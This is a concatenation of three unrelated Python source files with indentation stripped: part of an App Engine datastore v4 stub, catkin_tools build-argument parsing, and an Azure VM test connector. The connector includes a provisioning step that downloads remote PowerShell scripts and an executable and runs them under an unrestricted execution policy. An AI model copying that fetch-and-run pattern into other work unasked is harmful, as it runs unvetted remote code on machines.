v3_req = self.__service_converter.v4_run_query_req_to_v3_query(req)
v3_resp = datastore_pb.QueryResult()
self.__make_v3_call('RunQuery', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_run_query_resp(v3_resp)
if req.query().projection_list():
if req.query().projection_list() == ['__key__']:
result_type = datastore_v4_pb.EntityResult.KEY_ONLY
else:
result_type = datastore_v4_pb.EntityResult.PROJECTION
v4_resp.mutable_batch().set_entity_result_type(result_type)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_ContinueQuery(self, req, resp):
try:
self.__service_validator.validate_continue_query_req(req)
v3_req = self.__service_converter.v4_to_v3_next_req(req)
v3_resp = datastore_pb.QueryResult()
self.__make_v3_call('Next', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_continue_query_resp(v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_Lookup(self, req, resp):
try:
self.__service_validator.validate_lookup_req(req)
v3_req = self.__service_converter.v4_to_v3_get_req(req)
v3_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_req, v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
try:
v4_resp = self.__service_converter.v3_to_v4_lookup_resp(v3_resp)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.INTERNAL_ERROR, str(e))
resp.CopyFrom(v4_resp)
def _Dynamic_AllocateIds(self, req, resp):
v3_stub = apiproxy_stub_map.apiproxy.GetStub(V3_SERVICE_NAME)
try:
self.__service_validator.validate_allocate_ids_req(req)
if req.allocate_list():
v3_refs = self.__entity_converter.v4_to_v3_references(
req.allocate_list())
v3_full_refs = v3_stub._AllocateIds(v3_refs)
resp.allocated_list().extend(
self.__entity_converter.v3_to_v4_keys(v3_full_refs))
elif req.reserve_list():
v3_refs = self.__entity_converter.v4_to_v3_references(
req.reserve_list())
v3_stub._AllocateIds(v3_refs)
except datastore_pbs.InvalidConversionError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
except datastore_v4_validator.ValidationError, e:
raise apiproxy_errors.ApplicationError(
datastore_v4_pb.Error.BAD_REQUEST, str(e))
def __insert_v3_entity(self, v3_entity, v3_txn):
"""Inserts a v3 entity.
Args:
      v3_entity: an entity_pb.EntityProto
v3_txn: a datastore_pb.Transaction or None
Returns:
the number of index writes that occurred
Raises:
ApplicationError: if the entity already exists
"""
if not v3_txn:
v3_txn = datastore_pb.Transaction()
v3_begin_txn_req = datastore_pb.BeginTransactionRequest()
v3_begin_txn_req.set_app(v3_entity.key().app())
self.__make_v3_call('BeginTransaction', v3_begin_txn_req, v3_txn)
self.__insert_v3_entity(v3_entity, v3_txn)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_txn, v3_resp)
return v3_resp.cost().index_writes()
v3_get_req = datastore_pb.GetRequest()
v3_get_req.mutable_transaction().CopyFrom(v3_txn)
v3_get_req.key_list().append(v3_entity.key())
v3_get_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_get_req, v3_get_resp)
if v3_get_resp.entity(0).has_entity():
raise apiproxy_errors.ApplicationError(datastore_v4_pb.Error.BAD_REQUEST,
'Entity already exists.')
v3_put_req = datastore_pb.PutRequest()
v3_put_req.mutable_transaction().CopyFrom(v3_txn)
v3_put_req.entity_list().append(v3_entity)
v3_put_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_put_req, v3_put_resp)
return v3_put_resp.cost().index_writes()
def __update_v3_entity(self, v3_entity, v3_txn):
"""Updates a v3 entity.
Args:
      v3_entity: an entity_pb.EntityProto
v3_txn: a datastore_pb.Transaction or None
Returns:
the number of index writes that occurred
Raises:
ApplicationError: if the entity does not exist
"""
if not v3_txn:
v3_txn = datastore_pb.Transaction()
v3_begin_txn_req = datastore_pb.BeginTransactionRequest()
v3_begin_txn_req.set_app(v3_entity.key().app())
self.__make_v3_call('BeginTransaction', v3_begin_txn_req, v3_txn)
self.__update_v3_entity(v3_entity, v3_txn)
v3_resp = datastore_pb.CommitResponse()
self.__make_v3_call('Commit', v3_txn, v3_resp)
return v3_resp.cost().index_writes()
v3_get_req = datastore_pb.GetRequest()
v3_get_req.mutable_transaction().CopyFrom(v3_txn)
v3_get_req.key_list().append(v3_entity.key())
v3_get_resp = datastore_pb.GetResponse()
self.__make_v3_call('Get', v3_get_req, v3_get_resp)
if not v3_get_resp.entity(0).has_entity():
raise apiproxy_errors.ApplicationError(datastore_v4_pb.Error.BAD_REQUEST,
'Entity does not exist.')
v3_put_req = datastore_pb.PutRequest()
v3_put_req.mutable_transaction().CopyFrom(v3_txn)
v3_put_req.entity_list().append(v3_entity)
v3_put_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_put_req, v3_put_resp)
return v3_put_resp.cost().index_writes()
def __apply_v4_deprecated_mutation(self, v4_deprecated_mutation, v4_txn):
"""Applies a v4 DeprecatedMutation.
Args:
v4_deprecated_mutation: a datastore_v4_pb.DeprecatedMutation
v4_txn: an optional v4 transaction handle or None
Returns:
a datastore_v4_pb.DeprecatedMutationResult
"""
index_writes = 0
v3_txn = None
if v4_txn:
v3_txn = datastore_pb.Transaction()
self.__service_converter.v4_to_v3_txn(v4_txn, v3_txn)
for v4_entity in v4_deprecated_mutation.insert_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
index_writes += self.__insert_v3_entity(v3_entity, v3_txn)
for v4_entity in v4_deprecated_mutation.update_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
index_writes += self.__update_v3_entity(v3_entity, v3_txn)
v3_insert_auto_req = datastore_pb.PutRequest()
if v3_txn:
v3_insert_auto_req.mutable_transaction().CopyFrom(v3_txn)
for v4_entity in v4_deprecated_mutation.insert_auto_id_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
v3_insert_auto_req.entity_list().append(v3_entity)
v3_insert_auto_id_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_insert_auto_req, v3_insert_auto_id_resp)
index_writes += v3_insert_auto_id_resp.cost().index_writes()
v3_upsert_req = datastore_pb.PutRequest()
if v3_txn:
v3_upsert_req.mutable_transaction().CopyFrom(v3_txn)
for v4_entity in v4_deprecated_mutation.upsert_list():
v3_entity = entity_pb.EntityProto()
self.__entity_converter.v4_to_v3_entity(v4_entity, v3_entity)
v3_upsert_req.entity_list().append(v3_entity)
v3_upsert_resp = datastore_pb.PutResponse()
self.__make_v3_call('Put', v3_upsert_req, v3_upsert_resp)
index_writes += v3_upsert_resp.cost().index_writes()
v3_delete_req = datastore_pb.DeleteRequest()
if v3_txn:
v3_delete_req.mutable_transaction().CopyFrom(v3_txn)
for v4_key in v4_deprecated_mutation.delete_list():
self.__entity_converter.v4_to_v3_reference(v4_key,
v3_delete_req.add_key())
v3_delete_resp = datastore_pb.DeleteResponse()
self.__make_v3_call('Delete', v3_delete_req, v3_delete_resp)
index_writes += v3_delete_resp.cost().index_writes()
v4_deprecated_mutation_result = datastore_v4_pb.DeprecatedMutationResult()
for v3_ref in v3_insert_auto_id_resp.key_list():
self.__entity_converter.v3_to_v4_key(
v3_ref, v4_deprecated_mutation_result.add_insert_auto_id_key())
v4_deprecated_mutation_result.set_index_updates(index_writes)
return v4_deprecated_mutation_result
def __normalize_v4_run_query_request(self, v4_req):
pass
def __make_v3_call(self, method, v3_req, v3_resp):
apiproxy_stub_map.MakeSyncCall(V3_SERVICE_NAME, method, v3_req, v3_resp)
|
|
# Copyright 2014 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import re
import sys
from multiprocessing import cpu_count
from catkin_tools.common import wide_log
import catkin_tools.execution.job_server as job_server
def add_context_args(parser):
"""Add common workspace and profile args to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add_workspace_arg(parser)
add('--profile', default=None,
help='The name of a config profile to use (default: active profile)')
def add_workspace_arg(parser):
"""Add common workspace arg to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add('--workspace', '-w', default=None,
help='The path to the catkin_tools workspace or a directory contained within it (default: ".")')
def add_cmake_and_make_and_catkin_make_args(parser):
"""Add common make and cmake args to an argparse parser.
:param parser: The python argparse parser object (or subparser)
:type parser: ArgumentParser
"""
add = parser.add_argument
add('-j', '--jobs', default=None, type=int,
help='Maximum number of build jobs to be distributed across active packages. (default is cpu count)')
add('-p', '--parallel-packages', metavar='PACKAGE_JOBS', dest='parallel_jobs', default=None, type=int,
help='Maximum number of packages allowed to be built in parallel (default is cpu count)')
add('-l', '--load-average', default=None, type=float,
help='Maximum load average before no new build jobs are scheduled')
# Deprecated flags kept for compatibility
add('--parallel-jobs', '--parallel', action='store_true', dest='parallel_jobs', help=argparse.SUPPRESS)
add = parser.add_mutually_exclusive_group().add_argument
add('--jobserver', dest='use_internal_make_jobserver', default=None, action='store_true',
help='Use the internal GNU Make job server which will limit the number '
'of Make jobs across all active packages.')
add('--no-jobserver', dest='use_internal_make_jobserver', default=None, action='store_false',
help='Disable the internal GNU Make job server, and use an external one (like distcc, for example).')
add = parser.add_mutually_exclusive_group().add_argument
add('--env-cache', dest='use_env_cache', default=None, action='store_true',
help='Re-use cached environment variables when re-sourcing a resultspace that has been '
'loaded at a different stage in the task.')
add('--no-env-cache', dest='use_env_cache', default=None, action='store_false',
help='Don\'t cache environment variables when re-sourcing the same resultspace.')
add = parser.add_mutually_exclusive_group().add_argument
add('--cmake-args', metavar='ARG', dest='cmake_args', nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to CMake. '
        'It collects all of the following arguments until a "--" is read.')
add('--no-cmake-args', dest='cmake_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to CMake.')
add = parser.add_mutually_exclusive_group().add_argument
add('--make-args', metavar='ARG', dest='make_args', nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to make. '
        'It collects all of the following arguments until a "--" is read.')
add('--no-make-args', dest='make_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to make (does not affect --catkin-make-args).')
add = parser.add_mutually_exclusive_group().add_argument
add('--catkin-make-args', metavar='ARG', dest='catkin_make_args',
nargs='+', required=False, type=str, default=None,
help='Arbitrary arguments which are passed to make but only for catkin packages. '
        'It collects all of the following arguments until a "--" is read.')
add('--no-catkin-make-args', dest='catkin_make_args', action='store_const', const=[], default=None,
help='Pass no additional arguments to make for catkin packages (does not affect --make-args).')
def split_arguments(args, splitter_name=None, splitter_index=None):
"""Split list of args into (other, split_args, other) between splitter_name/index and `--`
:param args: list of all arguments
:type args: list of str
:param splitter_name: optional argument used to split out specific args
:type splitter_name: str
:param splitter_index: specific index at which to split
:type splitter_index: int
    :returns: tuple (before, split_args, after), or (args, []) if splitter_name is not present
"""
if splitter_index is None:
if splitter_name not in args:
return args, []
splitter_index = args.index(splitter_name)
start_index = splitter_index + 1
end_index = args.index('--', start_index) if '--' in args[start_index:] else None
if end_index:
return (
args[0:splitter_index],
args[start_index:end_index],
args[(end_index + 1):]
)
else:
return (
args[0:splitter_index],
args[start_index:],
[]
)
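# A hedged usage sketch of split_arguments (illustrative values, not part of
# the original module):
#
#     >>> split_arguments(
#     ...     ['build', '--cmake-args', '-DCMAKE_BUILD_TYPE=Release', '--', 'pkg'],
#     ...     splitter_name='--cmake-args')
#     (['build'], ['-DCMAKE_BUILD_TYPE=Release'], ['pkg'])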
def _extract_cmake_and_make_arguments(args, extract_catkin_make):
"""Extract arguments which are meant to be passed to CMake and GNU Make
through the catkin_tools command line interface.
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, make args, and catkin make args
:rtype: tuple
"""
cmake_args = []
make_args = []
catkin_make_args = []
arg_types = {}
if '--no-cmake-args' not in args:
arg_types['--cmake-args'] = cmake_args
if '--no-make-args' not in args:
arg_types['--make-args'] = make_args
    if '--no-catkin-make-args' not in args and extract_catkin_make:
arg_types['--catkin-make-args'] = catkin_make_args
# Get the splitter indexes for each type (multiples allowed) starting at the end
ordered_splitters = reversed([
(i, t)
for i, t in enumerate(args)
if t in arg_types
])
# Extract explicit specific args
head_args = args
tail_args = []
for index, name in ordered_splitters:
# Update whole args list, get specific args
head_args, specific, tail = split_arguments(head_args, splitter_index=index)
tail_args.extend(tail)
arg_types[name][0:0] = specific
args = head_args + tail_args
# classify -D* and -G* arguments as cmake specific arguments
if '--cmake-args' in arg_types:
implicit_cmake_args = [a for a in args if a.startswith('-D') or a.startswith('-G')]
args = [a for a in args if a not in implicit_cmake_args]
cmake_args = implicit_cmake_args + cmake_args
if '--no-cmake-args' not in args and len(cmake_args) == 0:
cmake_args = None
if '--no-make-args' not in args and len(make_args) == 0:
make_args = None
if '--no-catkin-make-args' not in args and len(catkin_make_args) == 0 and extract_catkin_make:
catkin_make_args = None
return args, cmake_args, make_args, catkin_make_args
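# A hedged example of the extraction above (illustrative argv, not part of the
# original module):
#
#     >>> _extract_cmake_and_make_arguments(
#     ...     ['build', '--cmake-args', '-DCMAKE_BUILD_TYPE=Release',
#     ...      '--make-args', '-j4'],
#     ...     extract_catkin_make=True)
#     (['build'], ['-DCMAKE_BUILD_TYPE=Release'], ['-j4'], None)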
def extract_cmake_and_make_and_catkin_make_arguments(args):
"""Extracts cmake, make, and catkin specific make arguments from given system arguments
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, make args, and catkin make args
:rtype: tuple
"""
return _extract_cmake_and_make_arguments(args, extract_catkin_make=True)
def extract_cmake_and_make_arguments(args):
"""Extracts cmake and make arguments from the given system arguments
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: tuple of separate args, cmake_args, and make_args
:rtype: tuple
"""
args, cmake_args, make_args, _ = _extract_cmake_and_make_arguments(args, extract_catkin_make=False)
return args, cmake_args, make_args
def extract_jobs_flags_values(mflags):
"""Gets the values of the make jobs flags
:param mflags: string of space separated make arguments
:type mflags: str
:returns: dictionary mapping jobs flags to jobs flags values
:rtype: dict
"""
jobs_dict = {'jobs': None, 'load-average': None}
# These regular expressions use (?P<name>...) for named capture groups
# (^|\s) and (?=$|\s) make sure that the flag is surrounded by whitespace
regex = r'(^|\s)(-j\s*|--jobs(=|\s+))(?P<jobs>\d*)(?=$|\s)'
for m in re.finditer(regex, mflags):
if m.group('jobs'):
jobs_dict['jobs'] = int(m.group('jobs'))
regex = r'(^|\s)(-l\s*|--load-average(=|\s+))(?P<load>\d*\.?\d*)(?=$|\s)'
for m in re.finditer(regex, mflags):
if m.group('load'):
jobs_dict['load-average'] = float(m.group('load'))
return jobs_dict
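# A hedged example (not part of the original module; shown dict key order may
# vary):
#
#     >>> extract_jobs_flags_values('-j4 --load-average=2.5')
#     {'jobs': 4, 'load-average': 2.5}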
def extract_jobs_flags(mflags):
"""Extracts make job flags from a list of other make flags, i.e. -j8 -l8
:param mflags: string of space separated make arguments
:type mflags: str
:returns: list of make jobs flags
:rtype: list
"""
if not mflags:
return None
# Each line matches a flag type, i.e. -j, -l, --jobs, --load-average
# (?:^|\s) and (?=$|\s) make sure that the flag is surrounded by whitespace
# (?:...) is just a group that will not be captured, this is necessary because the whole flag should be captured
# The upper two expressions are simple, they just match the flag, optional whitespace and an optional number
    # The bottom two expressions are more complicated because the long flag may be followed by '=' and a number,
    # by whitespace and a number, or by nothing
regex = r'(?:^|\s)(-j\s*\d*)(?=$|\s)|' + \
r'(?:^|\s)(-l\s*\d*\.?\d*)(?=$|\s)|' + \
r'(?:^|\s)(--jobs(?:(?:=|\s+)\d+)?)(?=$|\s)|' + \
r'(?:^|\s)(--load-average(?:(?:=|\s+)\d*\.?\d+)?)(?=$|\s)'
filtered_flags = []
for match in re.findall(regex, mflags):
filtered_flags.extend([m.strip() for m in match if m])
return filtered_flags or None
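# Hedged examples (not part of the original module):
#
#     >>> extract_jobs_flags('-j8 -l8 --silent')
#     ['-j8', '-l8']
#
# A string with no job flags (e.g. '--silent') yields None rather than an
# empty list.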
def handle_make_arguments(
input_make_args,
force_single_threaded_when_running_tests=False):
"""Special handling for make arguments.
If force_single_threaded_when_running_tests is True, jobs flags are
replaced with -j1, because tests cannot handle parallelization.
If no job flags are present and there are none in the MAKEFLAGS environment
variable, then make flags are set to the cpu_count, e.g. -j4 -l4.
:param input_make_args: list of make arguments to be handled
:type input_make_args: list
    :param force_single_threaded_when_running_tests: if True and a run_tests target is present, force -j1
:type force_single_threaded_when_running_tests: bool
:returns: copied list of make arguments, potentially with some modifications
:rtype: list
"""
make_args = list(input_make_args)
# Get the values for the jobs flags which may be in the make args
jobs_dict = extract_jobs_flags_values(' '.join(make_args))
jobs_args = extract_jobs_flags(' '.join(make_args))
if jobs_args:
# Remove jobs flags from cli args if they're present
make_args = re.sub(' '.join(jobs_args), '', ' '.join(make_args)).split()
if force_single_threaded_when_running_tests:
# force single threaded execution when running test since rostest does not support multiple parallel runs
run_tests = [a for a in make_args if a.startswith('run_tests')]
if run_tests:
wide_log('Forcing "-j1" for running unit tests.')
jobs_dict['jobs'] = 1
if job_server.gnu_make_enabled():
make_args.extend(job_server.gnu_make_args())
else:
        if jobs_dict.get('jobs') is not None:
            make_args.append('-j{0}'.format(jobs_dict['jobs']))
        if jobs_dict.get('load-average') is not None:
            make_args.append('-l{0}'.format(jobs_dict['load-average']))
return make_args
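# A hedged example (not part of the original module): with the internal GNU
# Make job server disabled, explicit job flags are stripped and re-appended,
# e.g.
#
#     >>> handle_make_arguments(['-j4', 'install'])
#     ['install', '-j4']
#
# With the job server enabled, the jobserver's own make arguments are appended
# instead of the explicit -j/-l flags.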
def configure_make_args(make_args, jobs_args, use_internal_make_jobserver):
"""Initialize the internal GNU Make jobserver or configure it as a pass-through
:param make_args: arguments to be passed to GNU Make
:type make_args: list
:param jobs_args: job arguments overriding make flags
:type jobs_args: list
:param use_internal_make_jobserver: if true, use the internal jobserver
    :type use_internal_make_jobserver: bool
:rtype: tuple (final make_args, using makeflags, using cliflags, using jobserver)
"""
# Configure default jobs options: use all CPUs in each package
try:
# NOTE: this will yield greater than 100% CPU utilization
n_cpus = cpu_count()
jobs_flags = {
'jobs': n_cpus,
'load-average': n_cpus + 1}
except NotImplementedError:
# If the number of cores cannot be determined, limit to one job
jobs_flags = {
'jobs': 1,
'load-average': 1}
# Get MAKEFLAGS from environment
makeflags_jobs_flags = extract_jobs_flags(os.environ.get('MAKEFLAGS', ''))
using_makeflags_jobs_flags = makeflags_jobs_flags is not None
if using_makeflags_jobs_flags:
makeflags_jobs_flags_dict = extract_jobs_flags_values(' '.join(makeflags_jobs_flags))
jobs_flags.update(makeflags_jobs_flags_dict)
# Extract make jobs flags (these override MAKEFLAGS)
cli_jobs_flags = jobs_args
using_cli_flags = len(cli_jobs_flags) > 0
if cli_jobs_flags:
jobs_flags.update(extract_jobs_flags_values(' '.join(cli_jobs_flags)))
# Remove jobs flags from cli args if they're present
make_args = re.sub(' '.join(cli_jobs_flags), '', ' '.join(make_args)).split()
# Instantiate the jobserver
job_server.initialize(
max_jobs=jobs_flags.get('jobs', None),
max_load=jobs_flags.get('load-average', None),
gnu_make_enabled=use_internal_make_jobserver)
# If the jobserver is supported
if job_server.gnu_make_enabled():
jobs_args = []
else:
jobs_args = cli_jobs_flags
return make_args + jobs_args, using_makeflags_jobs_flags, using_cli_flags, job_server.gnu_make_enabled()
def argument_preprocessor(args):
"""Perform processing of argument patterns which are not captured by
argparse, before being passed to argparse
:param args: system arguments from which special arguments need to be extracted
:type args: list
:returns: a tuple containing a list of the arguments which can be handled
by argparse and a dict of the extra arguments which this function has
extracted
:rtype: tuple
"""
# CMake/make pass-through flags collect dashed options. They require special
# handling or argparse will complain about unrecognized options.
# NOTE: http://bugs.python.org/issue9334
args = sys.argv[1:] if args is None else args
extract_make_args = extract_cmake_and_make_and_catkin_make_arguments
args, cmake_args, make_args, catkin_make_args = extract_make_args(args)
# Extract make jobs flags (these override MAKEFLAGS later on)
jobs_args = extract_jobs_flags(' '.join(args))
if jobs_args:
# Remove jobs flags from cli args if they're present
args = [arg for arg in args if arg not in jobs_args]
elif make_args is not None:
jobs_args = extract_jobs_flags(' '.join(make_args))
if jobs_args:
# Remove jobs flags from cli args if they're present
make_args = [arg for arg in make_args if arg not in jobs_args]
extras = {
'cmake_args': cmake_args,
'make_args': make_args,
'jobs_args': jobs_args,
'catkin_make_args': catkin_make_args,
}
return args, extras
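# A hedged example of the preprocessing above (illustrative argv, not part of
# the original module; shown dict key order may vary):
#
#     >>> args, extras = argument_preprocessor(
#     ...     ['build', '-j4', '--cmake-args', '-DCMAKE_BUILD_TYPE=Release'])
#     >>> args
#     ['build']
#     >>> extras
#     {'cmake_args': ['-DCMAKE_BUILD_TYPE=Release'], 'make_args': None,
#      'jobs_args': ['-j4'], 'catkin_make_args': None}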
|
|
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import time
import logging
import ConfigParser
import uuid
import random
import string
from utils import constants
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from msrestazure.azure_exceptions import CloudError
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
class AzureConnector:
"""
Azure connector that uses azure-sdk-for-python plugin.
"""
def __init__(self, clientid=None, secret=None, subscriptionid=None, tenantid=None,
imageid=None, instancetype=None, user=None, localpath=None, location=None,
sriov=None):
"""
Init Azure connector to create and configure instance VMs.
:param clientid: client id obtained from Azure AD application (create key)
https://docs.microsoft.com/en-us/azure/azure-resource-manager/
resource-group-create-service-principal-portal
:param secret: client secret obtained from the Azure AD application
:param subscriptionid: Azure subscription id
:param tenantid: Azure tenant/directory id
:param imageid: Azure requires multiple image references (publisher, offer, sku, version),
for simplicity only the offer and sku should be provided: e.g. UbuntuServer#16.04.0-LTS
:param instancetype: Azure hardware profile or vm size e.g. 'Standard_DS1'
:param user: remote ssh user for the VM
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param location: Azure global location to connect to
:param sriov: Enable/disable Accelerated Networking option
"""
credentials = ServicePrincipalCredentials(client_id=clientid, secret=secret,
tenant=tenantid)
self.resource_client = ResourceManagementClient(credentials, subscriptionid)
self.compute_client = ComputeManagementClient(credentials, subscriptionid)
self.storage_client = StorageManagementClient(credentials, subscriptionid)
self.network_client = NetworkManagementClient(credentials, subscriptionid)
self.instancetype = instancetype
self.localpath = localpath
self.sriov = sriov
self.host_key_file = os.path.join(self.localpath, 'known_hosts')
if not location:
self.location = 'westus'
else:
self.location = location
if 'Ubuntu' in imageid:
self.imageid = {'publisher': 'Canonical',
'offer': imageid.split('#')[0],
'sku': imageid.split('#')[1],
'version': 'latest'
}
self.user = user
self.dns_suffix = '.{}.cloudapp.azure.com'.format(self.location)
tag = str(uuid.uuid4()).replace('-', '')
self.key_name = 'test_ssh_key'
self.group_name = 'middleware_' + tag
self.vmnet_name = 'm_vmnet' + tag
self.subnet_name = 'm_subnet' + tag
self.os_disk_name = 'm_osdisk' + tag
self.storage_account = 'stor' + tag[:18]
self.ip_config_name = 'm_ipconfig' + tag
self.nic_name = 'm_nic' + tag
self.subnet = None
self.vms = []
def connect(self):
"""
        Authenticate and set up the shared Azure resources for the test VMs:
        the resource group, storage account, virtual network and subnet.
"""
log.info('Creating/updating resource group: {} with location: {}'.format(self.group_name,
self.location))
self.resource_client.resource_groups.create_or_update(self.group_name,
{'location': self.location})
if self.instancetype == 'Standard_NC6':
sku = 'standard_lrs'
else:
sku = 'premium_lrs'
storage_op = self.storage_client.storage_accounts.create(self.group_name,
self.storage_account,
{'sku': {'name': sku},
'kind': 'storage',
'location': self.location})
storage_op.wait()
create_vmnet = self.network_client.virtual_networks.create_or_update(
self.group_name, self.vmnet_name,
{'location': self.location,
'address_space': {'address_prefixes': ['10.10.0.0/16']}})
create_vmnet.wait()
create_subnet = self.network_client.subnets.create_or_update(
self.group_name, self.vmnet_name, self.subnet_name,
{'address_prefix': '10.10.10.0/24'})
self.subnet = create_subnet.result()
def create_vm(self, config_file=None, dns_suffix=None):
"""
Create an Azure VM instance.
:return: VirtualMachine object
or
:return: user, pass, VirtualMachine object in case of windows machine
"""
config = None
if config_file:
            log.info('Assuming Windows VM creation')
log.info('Looking up Windows VM credentials in {}\*.windows.'.format(config_file))
vm_file = [os.path.join(config_file, c) for c in os.listdir(config_file)
if c.endswith('.windows')][0]
# read credentials from file - should be present in the localpath provided to runner
config = ConfigParser.ConfigParser()
config.read(vm_file)
if 'Image' not in config.sections():
imageid = {'publisher': 'MicrosoftWindowsServer',
'offer': 'WindowsServer',
'sku': '2016-Datacenter',
'version': 'latest'}
else:
private_image = self.compute_client.images.get(
config.get('Image', 'resource_group'), config.get('Image', 'name'))
imageid = {'id': private_image.id}
vm_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))
nic = self.create_nic(vm_name, nsg=True)
vm_parameters = {
'location': self.location,
'os_profile': {
'computer_name': vm_name,
'admin_username': config.get('Windows', 'user'),
'admin_password': config.get('Windows', 'password'),
'windows_configuration': {'provision_vm_agent': True,
'enable_automatic_updates': False}
},
'hardware_profile': {'vm_size': self.instancetype},
'storage_profile': {
'image_reference': imageid,
'os_disk': {
'os_type': 'Windows',
'name': self.os_disk_name,
'caching': 'ReadWrite',
'create_option': 'fromImage'}},
'network_profile': {'network_interfaces': [{'id': nic.id}]}
}
else:
vm_name = self.imageid['offer'].lower() + str(time.time()).replace('.', '')
nic = self.create_nic(vm_name)
with open(os.path.join(self.localpath, self.key_name + '.pub'), 'r') as f:
key_data = f.read()
vm_parameters = {
'location': self.location,
'os_profile': {
'computer_name': vm_name,
'admin_username': self.user,
'linux_configuration': {
'disable_password_authentication': True,
'ssh': {
'public_keys': [{
'path': '/home/{}/.ssh/authorized_keys'.format(self.user),
'key_data': key_data}]}}},
'hardware_profile': {'vm_size': self.instancetype},
'storage_profile': {
'image_reference': self.imageid,
'os_disk': {
'name': self.os_disk_name,
'caching': 'None',
'create_option': 'fromImage',
'vhd': {'uri': 'https://{}.blob.core.windows.net/vhds/{}.vhd'.format(
self.storage_account, self.vmnet_name + str(time.time()))}}},
'network_profile': {'network_interfaces': [{'id': nic.id}]}
}
vm_creation = self.compute_client.virtual_machines.create_or_update(
self.group_name, vm_name, vm_parameters)
vm_creation.wait()
vm_instance = self.compute_client.virtual_machines.get(self.group_name, vm_name)
log.info('Created VM: {}'.format(vm_name))
vm_start = self.compute_client.virtual_machines.start(self.group_name, vm_name)
vm_start.wait()
log.info('Started VM: {}'.format(vm_name))
self.vms.append(vm_instance)
if config_file:
ext = self.compute_client.virtual_machine_extensions.create_or_update(
self.group_name, vm_name, 'custom_extension_script',
{'location': self.location,
'publisher': 'Microsoft.Compute',
'virtual_machine_extension_type': 'CustomScriptExtension',
'type_handler_version': '1.7',
'auto_upgrade_minor_version': True,
'settings': {
'fileUris': ['https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/ConfigureWinRM.ps1',
'https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/makecert.exe',
'https://raw.githubusercontent.com/Azure/azure-quickstart-templates/master/201-vm-winrm-windows/winrmconf.cmd'],
'commandToExecute': 'powershell -ExecutionPolicy Unrestricted -file ConfigureWinRM.ps1 {vm}'.format(vm='*'+dns_suffix)}
})
log.info('Ran custom script on VM: {}'.format(ext.result()))
return config.get('Windows', 'user'), config.get('Windows', 'password'), vm_instance
else:
return vm_instance
